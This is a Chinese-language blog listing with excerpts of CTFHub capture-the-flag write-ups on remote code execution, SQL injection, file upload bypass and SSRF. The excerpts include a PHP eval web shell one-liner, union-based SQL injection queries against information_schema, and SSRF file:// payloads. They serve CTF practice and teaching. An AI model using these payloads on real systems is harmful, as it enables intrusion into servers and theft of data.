CTFHub
文章平均质量分 73
ctfhub上做的题目
空白行
.
展开
-
CTFHub-RCE
RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)是互联网的一种安全漏洞。它可以让攻击者直接向后台服务器远程注入操作系统命令,相当于直接操控服务器电脑的cmd命令行!从而操控后台系统,高危漏洞!RCE漏洞产生的根本原因:服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。eval执行我们直接在输入栏上输入类似cmd的命令行,直接操作web服务器执行我们所写的命令内容查看当前目录文件原创 2022-04-09 21:16:05 · 373 阅读 · 0 评论 -
ctfhub-sql注入
整数型注入行数1 order by 2数据库名-1 union select 1,database() --一开始我在后面加上+,但是这个+是在url才可以被当作空格,有点傻了表名-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' --字段-1 union select 1,group_concat(column_name) fro原创 2022-04-07 20:09:27 · 1873 阅读 · 0 评论 -
CTFHub-文件上传
无验证上传一个一句话木马<?php @eval($_POST['upload']);?>然后用蚁剑连接在上级目录就可以看到flag的php文件前端验证这个可以用burp suit抓包,分析一下,发现只允许jpg,png,gif格式上传,我们将php文件后缀改成jpg提交,然后抓包再改回来,用蚁剑连接成功.htaccess验证htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、原创 2022-04-08 15:57:26 · 953 阅读 · 0 评论 -
CTFHub-SSRF(未完)
内网访问本题很简单,用bs抓包,然后在url中添加127.0.0.1/flag.php伪协议读取文件提示:尝试去读取一下Web目录下的flag.php吧一般遇到SSRF时,先测试所有的url协议file:///dict://sftp://ldap://tftp://gopher://网站的根目录一般在var/www/htmlfile:///var/www/html/flag.php端口扫描参考博客提示:来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦原创 2022-04-15 15:38:34 · 150 阅读 · 0 评论